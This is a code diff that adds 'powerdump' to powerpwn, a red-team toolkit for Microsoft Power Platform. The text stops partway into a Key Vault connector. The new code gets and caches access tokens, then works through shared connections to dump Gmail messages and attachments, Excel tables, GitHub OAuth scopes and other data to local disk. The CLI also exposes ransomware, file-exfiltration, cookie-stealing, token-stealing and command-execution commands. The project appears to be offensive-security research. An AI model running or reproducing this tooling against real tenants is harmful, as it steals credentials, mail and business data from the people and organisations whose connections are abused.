diff --git a/docs/powerdump/README.md b/docs/powerdump/README.md new file mode 100644 index 0000000..c9e7420 --- /dev/null +++ b/docs/powerdump/README.md @@ -0,0 +1,49 @@ +# PowerDump + + +powerdump is a tool for exploring information in Microsoft PowerPlatform from a Red Team perspective. In short, this is what it does: +* Generates access tokens to fetch available resources in Microsoft PowerApps. +* Use HTTP calls in Python to dump all available information in the Micsrofot PowerPlatform to local directory. +* Generates access tokens to perform advanced actions on discovered resources. +* Provide a basic GUI to present collected resources and data. + +powerpwn uses `browsepy` Python library and is only compatible with Python 3.6-3.8 (development is done with Python 3.8). + +### Installation +**Using a version from GitHub** + +Clone the repository and run: + +``` +pip install . +``` + +### Installation for development +Clone the repository and setup a virtual environment in your IDE. Install python packages by running: + +``` +python init_repo.py + +``` +To activate the virtual environment (.venv) run: +``` +.\.venv\Scripts\activate (Windows) + +./.venv/bin/activate (Linux) + +``` + +### Using powerpwn +**Explore using cli** +* Run `powerpwn dump --tenant {tenantId} --cache-path {path}` to collect data from tenantId and store it in path. The default cache-path is `.cache` . +* For more options run `powerpwn dump --help` +* On first run, a device flow will initiate to acquire an access token. +* This may take a while depends on the tenant size. Once collect is done, you can find collected resources and data under `path` directory +* Access tokens to powerapps and apihub are cached in tokens.json file. +* To run a local server for gui, run dump command with `-g` or `--gui`. + +**Using Gui** +* Run `powerpwn gui --cache-path {path}`, with same cache-path of `dump` command. The default cache-path is `.cache` . +* On http://127.0.0.1:5000/ you can find an application with all collected resources +* For connections, Playground will generate the connections swagger, that allow you to run these connections and perform actions on the platform. To authenticate, use the generated apihub access token generated in the previous step. +* On http://127.0.0.1:8080/ you can find a simple file browser with all resources and data dump. diff --git a/init_repo.py b/init_repo.py index 809c1d3..7744f8d 100644 --- a/init_repo.py +++ b/init_repo.py @@ -3,11 +3,11 @@ import sys -def log(message: str): +def log(message: str) -> None: print(f"[init_repo] {message}") -def check_python_version(): +def check_python_version() -> bool: version_info = sys.version_info if version_info.major != 3: return False @@ -17,28 +17,29 @@ def check_python_version(): return True -if check_python_version(): - log("Setting python path") - # set pythonpath - sys.path.append("./src") +def main() -> None: + if check_python_version(): + log("Creating virtual environment") + subprocess.run("python -m venv .venv") # nosec - log("Creating virtual environment") - subprocess.run("python -m venv .venv") # nosec + log("Installing python packages") + py_path = os.path.join(".venv", "Scripts", "python") - log("Installing python packages") - py_path = os.path.join(".venv", "Scripts", "python") + if not sys.platform.startswith("win"): + py_path = os.path.join(".venv", "bin", "python") - if not sys.platform.startswith("win"): - py_path = os.path.join(".venv", "bin", "python") + subprocess.run(f"{py_path} -m pip install --upgrade pip", shell=True) # nosec - subprocess.run(f"{py_path} -m pip install --upgrade pip", shell=True) # nosec + # install packages + subprocess.run(f"{py_path} -m pip install -r requirements.txt", shell=True) # nosec - # install packages - subprocess.run(f"{py_path} -m pip install -r requirements.txt", shell=True) # nosec + log("Python packages installed successfully") - log("Python packages installed successfully") + log("DONE!") - log("DONE!") + else: + log("Supported python versions are 3.6-3.8") -else: - log("Supported python versions are 3.6-3.8") + +if __name__ == "__main__": + main() diff --git a/readme.md b/readme.md index d4c5048..a6066b5 100644 --- a/readme.md +++ b/readme.md @@ -13,4 +13,6 @@ Disclaimer: these materials are presented from an attacker’s perspective with [LCNC Malware](docs/machinepwn/machine_pwn.md) +[PowerDump](docs/powerdump/README.md) + [PowerDoor](docs/powerdoor/readme.md) diff --git a/setup.cfg b/setup.cfg index 7d1e2a4..3ae03ee 100644 --- a/setup.cfg +++ b/setup.cfg @@ -24,9 +24,9 @@ install_requires = art typing_extensions<4.6.0 -packages = find: package_dir = = src +packages = find: [options.packages.find] where = src diff --git a/src/powerpwn/cli.py b/src/powerpwn/cli.py index f7660b0..709381f 100644 --- a/src/powerpwn/cli.py +++ b/src/powerpwn/cli.py @@ -1,6 +1,8 @@ import argparse import json import logging +import os +import shutil from art import tprint @@ -10,71 +12,95 @@ from powerpwn.machinepwn.machine_pwn import MachinePwn from powerpwn.powerdoor.backdoor_flow import BackdoorFlow from powerpwn.powerdoor.enums.action_type import ActionType +from powerpwn.powerdump.collect.data_collectors.data_collector import DataCollector +from powerpwn.powerdump.collect.resources_collectors.resources_collector import ResourcesCollector +from powerpwn.powerdump.gui.gui import Gui +from powerpwn.powerdump.utils.auth import acquire_token, acquire_token_from_cached_refresh_token +from powerpwn.powerdump.utils.const import API_HUB_SCOPE, CACHE_PATH, POWER_APPS_SCOPE logger = logging.getLogger(LOGGER_NAME) -def register_machine_pwn_common_args(sub_parser: argparse.ArgumentParser): +def register_gui_parser(sub_parser: argparse.ArgumentParser) -> None: + gui_parser = sub_parser.add_parser("gui", description="Show collected resources and data.", help="Show collected resources and data via GUI.") # type: ignore[attr-defined] + gui_parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") + gui_parser.add_argument("--cache-path", default=CACHE_PATH, type=str, help="Path to cached resources.") + + +def register_collect_parser(sub_parser: argparse.ArgumentParser) -> None: + explore_parser = sub_parser.add_parser( # type: ignore[attr-defined] + "dump", description="Collect all available data in tenant", help="Get all available resources in tenant and dump data." + ) + explore_parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") + explore_parser.add_argument("-c", "--clear-cache", action="store_true", help="Clear local disk cache") + explore_parser.add_argument("--cache-path", default=CACHE_PATH, help="Path to store collected resources and data.") + explore_parser.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to connect.") + explore_parser.add_argument("-g", "--gui", action="store_true", help="Run local server for gui.") + + +def register_machine_pwn_common_args(sub_parser: argparse.ArgumentParser) -> None: sub_parser.add_argument("-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform") sub_parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") -def register_backdoor_flow_common_args(sub_parser: argparse.ArgumentParser): +def register_backdoor_flow_common_args(sub_parser: argparse.ArgumentParser) -> None: sub_parser.add_argument("-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform") sub_parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") sub_parser.add_argument("-e", "--environment-id", required=True, type=str, help="Environment id in powerplatform.") -def register_exec_parsers(command_subparsers: argparse.ArgumentParser): - steal_fqdn_parser = command_subparsers.add_parser("steal-cookie", description="Steal cookie of fqdn") +def register_exec_parsers(command_subparsers: argparse.ArgumentParser) -> None: + steal_fqdn_parser = command_subparsers.add_parser("steal-cookie", description="Steal cookie of fqdn") # type: ignore[attr-defined] register_steal_fqdn_cookie_parser(steal_fqdn_parser) - steal_power_automate_token_parser = command_subparsers.add_parser("steal-power-automate-token", description="Steal power automate token") + steal_power_automate_token_parser = command_subparsers.add_parser("steal-power-automate-token", description="Steal power automate token") # type: ignore[attr-defined] register_machine_pwn_common_args(steal_power_automate_token_parser) - execute_command_parser = command_subparsers.add_parser("command-exec", description="Execute command on machine") + execute_command_parser = command_subparsers.add_parser("command-exec", description="Execute command on machine") # type: ignore[attr-defined] register_exec_command_parser(execute_command_parser) - ransomware_parser = command_subparsers.add_parser("ransomware", description="Ransomware") + ransomware_parser = command_subparsers.add_parser("ransomware", description="Ransomware") # type: ignore[attr-defined] register_ransomware_parser(ransomware_parser) - exflirtate_file_parser = command_subparsers.add_parser("exflirtate", description="Exflirtate file") + exflirtate_file_parser = command_subparsers.add_parser("exflirtate", description="Exflirtate file") # type: ignore[attr-defined] register_exflirtate_file_parser(exflirtate_file_parser) - cleanup_parser = command_subparsers.add_parser("cleanup", description="Cleanup") + cleanup_parser = command_subparsers.add_parser("cleanup", description="Cleanup") # type: ignore[attr-defined] register_machine_pwn_common_args(cleanup_parser) ## machine pwn parsers ## -def register_steal_fqdn_cookie_parser(sub_parser: argparse.ArgumentParser): +def register_steal_fqdn_cookie_parser(sub_parser: argparse.ArgumentParser) -> None: register_machine_pwn_common_args(sub_parser) sub_parser.add_argument("-fqdn", "--cookie", required=True, type=str, help="Fully qualified domain name to fetch the cookies of") -def register_exec_command_parser(sub_parser: argparse.ArgumentParser): +def register_exec_command_parser(sub_parser: argparse.ArgumentParser) -> None: register_machine_pwn_common_args(sub_parser) sub_parser.add_argument("-t", "--type", required=True, type=str, choices=[cmd_type.value for cmd_type in CodeExecTypeEnum], help="Command type") sub_parser.add_argument("-c", "--command-to-execute", required=True, type=str, help="Command to execute") -def register_ransomware_parser(sub_parser: argparse.ArgumentParser): +def register_ransomware_parser(sub_parser: argparse.ArgumentParser) -> None: register_machine_pwn_common_args(sub_parser) sub_parser.add_argument("--crawl_depth", required=True, type=str, help="Recursively search into subdirectories this many times") sub_parser.add_argument("-k", "--encryption-key", required=True, type=str, help="an encryption key used to encrypt each file identified (AES256)") sub_parser.add_argument( - "--dirs", required=True, type=str, help="A list of directories to begin crawl from separated by a command (e.g.'C:\\,D:\\')" + "--dirs", required=True, type=str, help="A list of directories to begin crawl from separated by a comma (e.g.'C:\\,D:\\')" ) -def register_exflirtate_file_parser(sub_parser: argparse.ArgumentParser): +def register_exflirtate_file_parser(sub_parser: argparse.ArgumentParser) -> None: register_machine_pwn_common_args(sub_parser) sub_parser.add_argument("-f", "--file", required=True, type=str, help="Absolute path to file") -def parse_arguments(): +def parse_arguments() -> argparse.Namespace: parser = argparse.ArgumentParser() parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") command_subparsers = parser.add_subparsers(help="command", dest="command") + register_collect_parser(command_subparsers) # type: ignore[arg-type] + register_gui_parser(command_subparsers) # type: ignore[arg-type] ## Delete Flow parser ## delete_flow_parser = command_subparsers.add_parser("delete-flow", description="Deletes flow.", help="Deletes flow using installed backdoor flow.") @@ -95,13 +121,45 @@ def parse_arguments(): register_backdoor_flow_common_args(get_connections_parser) get_connections_parser.add_argument("-o", "--output", type=str, default="", help="Path to output file.") - register_exec_parsers(command_subparsers) + register_exec_parsers(command_subparsers) # type: ignore[arg-type] args = parser.parse_args() return args -def run_backdoor_flow_command(args): +def __init_command_token(args: argparse.Namespace, scope: str) -> str: + # if cached refresh token is found, use it + if token := acquire_token_from_cached_refresh_token(scope, args.tenant): + return token + + return acquire_token(scope=scope, tenant=args.tenant) + + +def run_collect_resources_command(args: argparse.Namespace) -> None: + # cache + if args.clear_cache: + try: + shutil.rmtree(args.cache_path) + except FileNotFoundError: + pass + os.makedirs(args.cache_path, exist_ok=True) + + token = __init_command_token(args, POWER_APPS_SCOPE) + + entities_fetcher = ResourcesCollector(token=token, cache_path=args.cache_path) + entities_fetcher.collect_and_cache() + + +def run_gui_command(args: argparse.Namespace) -> None: + Gui().run(cache_path=args.cache_path) + + +def run_collect_data_command(args: argparse.Namespace) -> None: + token = __init_command_token(args, API_HUB_SCOPE) + DataCollector(token=token, cache_path=args.cache_path).collect() + + +def run_backdoor_flow_command(args: argparse.Namespace) -> None: action_type = ActionType(args.command) backdoor_flow = BackdoorFlow(args.webhook_url) if action_type == ActionType.delete_flow: @@ -120,7 +178,7 @@ def run_backdoor_flow_command(args): logger.info(connections) -def run_machine_pwn_command(args): +def run_machine_pwn_command(args: argparse.Namespace) -> None: command_type = CommandToRunEnum(args.command) machine_pwn = MachinePwn(args.webhook_url) if command_type == CommandToRunEnum.CLEANUP: @@ -130,7 +188,7 @@ def run_machine_pwn_command(args): elif command_type == CommandToRunEnum.EXFILTRATION: res = machine_pwn.exfiltrate(args.file) elif command_type == CommandToRunEnum.RANSOMWARE: - res = machine_pwn.ransomware(args.crawl_depth, args.dirs, args.encryption_key) + res = machine_pwn.ransomware(args.crawl_depth, args.dirs.split(","), args.encryption_key) elif command_type == CommandToRunEnum.STEAL_COOKIE: res = machine_pwn.steal_cookie(args.cookie) elif command_type == CommandToRunEnum.STEAL_POWER_AUTOMATE_TOKEN: @@ -138,7 +196,7 @@ def run_machine_pwn_command(args): print(res) -def main(): +def main() -> None: print("\n\n------------------------------------------------------------") tprint("powerpwn") print("------------------------------------------------------------\n\n") @@ -149,7 +207,18 @@ def main(): logger.level = args.log_level command = args.command - if command in [action_type.value for action_type in ActionType]: + if command == "dump": + run_collect_resources_command(args) + run_collect_data_command(args) + logger.info(f"Dump is completed in {args.cache_path}") + if args.gui: + logger.info("Going to run local server for gui") + run_gui_command(args) + + elif command == "gui": + run_gui_command(args) + + elif command in [action_type.value for action_type in ActionType]: run_backdoor_flow_command(args) elif command in [cmd_type.value for cmd_type in CommandToRunEnum]: diff --git a/src/powerpwn/powerdump/__init__.py b/src/powerpwn/powerdump/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/__init__.py b/src/powerpwn/powerdump/collect/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/data_collectors/__init__.py b/src/powerpwn/powerdump/collect/data_collectors/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/__init__.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connections_data_collector.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connections_data_collector.py new file mode 100644 index 0000000..b6532ca --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connections_data_collector.py @@ -0,0 +1,63 @@ +import base64 +import io +import os +from typing import List + +import PIL.Image as Image +import requests + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors import API_NAME_TO_CONNECTOR_CLS +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_source import DataDumpSource +from powerpwn.powerdump.collect.data_collectors.idata_collector import IDataCollector +from powerpwn.powerdump.collect.models.data_dump_entity import DataDumpWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStoreWithContext +from powerpwn.powerdump.utils.model_loaders import get_connector, load_connections + + +class ConnectionsDataCollector(IDataCollector): + def __init__(self, cache_path: str) -> None: + self.__cache_path = cache_path + + def collect(self, session: requests.Session, env_id: str, output_dir_path: str) -> None: + data_dumps: List[DataDumpWithContext] = [] + connections_dumps_root_dir = os.path.join(output_dir_path, DataDumpSource.connections.value) + + for connection in load_connections(cache_path=self.__cache_path, env_id=env_id): + current_data_stores: List[DataStoreWithContext] = [] + connection_id = connection.connection_id + api_name = connection.api_name + + connections_apis_dir = os.path.join(connections_dumps_root_dir, connection.api_name) + if not connection.shareable: + continue + if api_name in API_NAME_TO_CONNECTOR_CLS: + connection_dump_root_dir = os.path.join(connections_apis_dir, connection.connection_id) + + connector_cls = API_NAME_TO_CONNECTOR_CLS[api_name] + spec = get_connector(self.__cache_path, connection.environment_id, connector_cls.api_name()) + + connector_cls_instance = connector_cls(session=session, spec=spec, connection_id=connection_id) + current_data_stores = connector_cls_instance.ping(connection_parameters=connection.connection_parameters) + + for data_store in current_data_stores: + data_records = connector_cls_instance.enum(data_store=data_store) + for data_record in data_records: + data_dump_type_dir = os.path.join(connection_dump_root_dir, data_record.data_record.record_type) + os.makedirs(data_dump_type_dir, exist_ok=True) + data_dump = connector_cls_instance.dump(data_record=data_record) + data_dump_path = os.path.join(data_dump_type_dir, f"{data_record.data_record.record_name}.{data_dump.data_dump.extension}") + encoding = data_dump.data_dump.encoding + extension = data_dump.data_dump.extension + content = data_dump.data_dump.content + if extension == "png": + self.__dump_png(content, data_dump_path) + else: + with open(data_dump_path, "w") as f: + content = content.decode(encoding) if encoding else content + f.write(content) + data_dumps.append(data_dump) + + def __dump_png(self, bytes: bytes, path: str) -> None: + image_bytes = base64.b64decode(bytes) + img = Image.open(io.BytesIO(image_bytes)) + img.save(path) diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/__init__.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/__init__.py new file mode 100644 index 0000000..becd45d --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/__init__.py @@ -0,0 +1,22 @@ +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.excelonlinebusiness import ExcelOnlineBusinessConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.github import GitHubConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.gmail import GmailConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.keyvault import KeyVaultConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azureblob import SharedAzureBlobConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azurequeues import SharedAzureQueuesConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azuretables import SharedAzureTablesConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_documentdb import SharedDocumentDBConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_sql import SharedSqlConnector + +CONNECTOR_CLS_SET = { + KeyVaultConnector, + GitHubConnector, + GmailConnector, + ExcelOnlineBusinessConnector, + SharedSqlConnector, + SharedDocumentDBConnector, + SharedAzureTablesConnector, + SharedAzureBlobConnector, + SharedAzureQueuesConnector, +} +API_NAME_TO_CONNECTOR_CLS = {connector_cls.api_name(): connector_cls for connector_cls in CONNECTOR_CLS_SET} diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/connector_base.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/connector_base.py new file mode 100644 index 0000000..915a720 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/connector_base.py @@ -0,0 +1,71 @@ +import abc +from typing import List + +import requests + +from powerpwn.powerdump.collect.models.connector_entity import Connector +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump, DataDumpWithContext +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext + + +class ConnectorBase(abc.ABC): + def __init__(self, session: requests.Session, spec: Connector, connection_id: str): + self._session = session + self._environment_id = spec.environment_id + self._connection_id = connection_id + + host = spec.swagger["host"] + base_path = spec.swagger["basePath"] + self._root = f"https://{host}{base_path}/{connection_id}" + + def ping(self, connection_parameters: dict) -> List[DataStoreWithContext]: + """ + Test connection to api + + Args: + connection_parameters (dict): connection parameters to api + + Returns: + list[DataStoreWithContext]: list of data store entities to query + """ + return [ + DataStoreWithContext(api_name=self.api_name(), connection_id=self._connection_id, data_store=data_store) + for data_store in self._ping(connection_parameters=connection_parameters) + ] + + def _ping(self, connection_parameters: dict) -> List[DataStore]: + pass + + def enum(self, data_store: DataStoreWithContext) -> List[DataRecordWithContext]: + return [DataRecordWithContext(data_store=data_store, data_record=data_record) for data_record in self._enum(data_store=data_store)] + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + pass + + def dump(self, data_record: DataRecordWithContext) -> DataDumpWithContext: + """ + Dump data + + Args: + data_record (DataRecordWithContext): data record details to dump + + Returns: + DataDumpWithContext: dump data + """ + return DataDumpWithContext(data_record=data_record, data_dump=self._dump(data_record=data_record)) + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + pass + + @classmethod + def api_name(cls) -> str: + pass + + @classmethod + def _apim_path(cls) -> str: + pass + + @classmethod + def uses_undocumented_api_properties(cls) -> bool: + return False diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/excelonlinebusiness.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/excelonlinebusiness.py new file mode 100644 index 0000000..7240285 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/excelonlinebusiness.py @@ -0,0 +1,144 @@ +import json +from typing import Any, Dict, List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class ExcelOnlineBusinessConnector(ConnectorBase): + def _ping(self, connection_parameters: Dict[str, Any]) -> List[DataStore]: + records: List[DataStore] = [] + + sources_success, sources_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/codeless/v1.0/sources" + ) + + if sources_success: + for source in sources_val: + source_id = source["id"] + + params = {"source": source_id} + drives_success, drives_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/codeless/v1.0/drives", params=params + ) + + if drives_success: + for drive in drives_val: + records.append( + DataStore( + tenant=None, + account=connection_parameters["accountName"], + scope=None, + host=drive["webUrl"], + name=drive["name"], + extra={"source": source, "drive": drive}, + ) + ) + + return records + + def __enum_dir(self, source_id: str, drive_id: str, folder_id: str) -> List[Dict[str, Any]]: + file_objs: List[Dict[str, Any]] = [] + + if folder_id == "root": + folder_path = "root" + else: + folder_path = f"items/{folder_id}" + + params = {"source": source_id} + can_list_folder, _, list_folder_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/codeless/v1.0/drives/{drive_id}/{folder_path}/children", + params=params, + ) + if can_list_folder: + if not isinstance(list_folder_val, list): + raise ValueError(f"Unexpected response list_folder_val: {list_folder_val}.") + + for file_or_dir_obj in list_folder_val: + if not isinstance(file_or_dir_obj, dict): + raise ValueError(f"Unexpected response file_or_dir_obj: {file_or_dir_obj}.") + if file_or_dir_obj["IsFolder"]: + file_objs += self.__enum_dir(source_id=source_id, drive_id=drive_id, folder_id=file_or_dir_obj["Id"]) + else: + file_objs += [file_or_dir_obj] + + return file_objs + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + source_id = data_store.data_store.extra["source"]["id"] + drive_id = data_store.data_store.extra["drive"]["id"] + + drive_files = self.__enum_dir(source_id=source_id, drive_id=drive_id, folder_id="root") + + for file_obj in drive_files: + file_id = file_obj["Id"] + + params = {"source": source_id} + tables_success, tables_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + url=f"{self._root}/codeless/v1.0/drives/{drive_id}/items/{file_id}/workbook/tables", + params=params, + ) + + if tables_success: + for table_obj in tables_val: + table_id = table_obj["id"] + + data_records.append( + DataRecord( + record_type=DataDumpType.table, + record_id=table_id, + record_name=f"{file_obj['Path']}/{table_obj['name']}", + extra={"file": file_obj, "table": table_obj}, + ) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + if data_record.data_record.record_type == DataDumpType.table: + source_id = data_record.data_store.data_store.extra["source"]["id"] + drive_id = data_record.data_store.data_store.extra["drive"]["id"] + file_id = data_record.data_record.extra["file"]["Id"] + table_id = data_record.data_record.extra["table"]["id"] + + success, rows_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + url=f"{self._root}/drives/{drive_id}/files/{file_id}/tables/{table_id}/items", + params={"source": source_id}, + ) + if success: + extension = "json" + encoding = ENCODING + content = json.dumps(rows_val).encode(ENCODING) + + else: + raise ValueError(f"Unsupported data type: {data_record.data_record.record_type}.") + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + data_dump = DataDump(extension=extension, encoding=encoding, content=content) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_excelonlinebusiness" + + @classmethod + def _apim_path(cls) -> str: + return "excelonlinebusiness" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/github.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/github.py new file mode 100644 index 0000000..b8bdf5f --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/github.py @@ -0,0 +1,45 @@ +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.requests_wrapper import request_and_verify + + +class GitHubConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + records: List[DataStore] = [] + + # while spec documents status_code 200 on success, 202 has been observed as well + success, head, val = request_and_verify( + session=self._session, expected_status_prefix="20", method="get", url=f"{self._root}/trigger/issueClosed" + ) + + if success: + records.append( + DataStore( + tenant=None, account=head["x-oauth-client-id"], scope=head["x-oauth-scopes"], host="https://api.github.com/", name=None, extra={} + ) + ) + + return records + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + raise NotImplementedError() + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + raise NotImplementedError() + + @classmethod + def api_name(cls) -> str: + return "shared_github" + + @classmethod + def _apim_path(cls) -> str: + return "github" + + @classmethod + def uses_undocumented_api_properties(cls) -> bool: + # headers returned from the API are not documented in the swagger + return True diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/gmail.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/gmail.py new file mode 100644 index 0000000..f46c050 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/gmail.py @@ -0,0 +1,138 @@ +from typing import List, Set + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import request_and_verify + + +class GmailConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/TestConnection") + + if success: + return [ + DataStore( + tenant=None, account=connection_parameters["accountName"], scope=None, host="https://gmail.googleapis.com/", name=None, extra={} + ) + ] + return [] + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + unique_email_ids_seen: Set[str] = set() + + can_list_labels, _, labels_val = request_and_verify( + session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/Mail/Labels" + ) + if can_list_labels: + # Iterate over parameters to enum as many emails as possible + for label_obj in labels_val: + for fetch_only_with_attachments in (True, False): + for importance in ("Important", "Not important"): + for starred in ("Starred", "Not starred"): + params = { + "label": label_obj["Id"], + "importance": importance, + "starred": starred, + "fetchOnlyWithAttachments": fetch_only_with_attachments, + "includeAttachments": True, + "subject": "", + } + + # Iterate over as many subjects as possible + get_email_success = True + while get_email_success: + get_email_success, _, get_email_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/Mail/LastReceived", + params=params, + ) + + if get_email_success: + if get_email_val.get("Id") not in unique_email_ids_seen: + data_records.append( + DataRecord( + record_type=DataDumpType.email, + record_id=get_email_val["Id"], + record_name=get_email_val["Subject"], + extra={k: v for k, v in get_email_val.items() if k not in {"Body", "Attachments"}}, + ) + ) + + for attachment_obj in get_email_val["Attachments"]: + data_records.append( + DataRecord( + record_type=DataDumpType.attachment, + record_id=get_email_val["Id"], + record_name=attachment_obj["Name"], + extra={k: v for k, v in attachment_obj.items() if k not in {"ContentBytes"}}, + ) + ) + + # avoid processing the same email twice + unique_email_ids_seen.add(get_email_val["Id"]) + + # Ignore identical subjects to continue iteration + params["subject"] += f" -{get_email_val['Subject']}" + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + if data_record.data_record.record_type == DataDumpType.email: + success, _, get_email_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/Mail/{data_record.data_record.record_id}", + params={"includeAttachments": False}, + ) + if success: + extension = "html" if data_record.data_record.extra.get("IsHtml", False) else "txt" + encoding = ENCODING + content = get_email_val["Body"].encode(ENCODING) + + elif data_record.data_record.record_type == DataDumpType.attachment: + success, _, get_email_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/Mail/{data_record.data_record.record_id}", + params={"includeAttachments": True}, + ) + + if success: + for attachment_obj in get_email_val["Attachments"]: + if attachment_obj["Name"] == data_record.data_record.record_name: + extension = attachment_obj["ContentType"].partition('name="')[2].partition(".")[-1].replace('"', "") + encoding = None + content = attachment_obj["ContentBytes"] + + # We are looking for a specific attachment + break + else: + # Couldn't find relevant attachment + success = False + else: + raise ValueError(f"Unsupported data type: {data_record.data_record.record_type}.") + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + data_dump = DataDump(extension=extension, encoding=encoding, content=content) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_gmail" + + @classmethod + def _apim_path(cls) -> str: + return "gmail" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/keyvault.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/keyvault.py new file mode 100644 index 0000000..0a93d7f --- /dev/null +++ 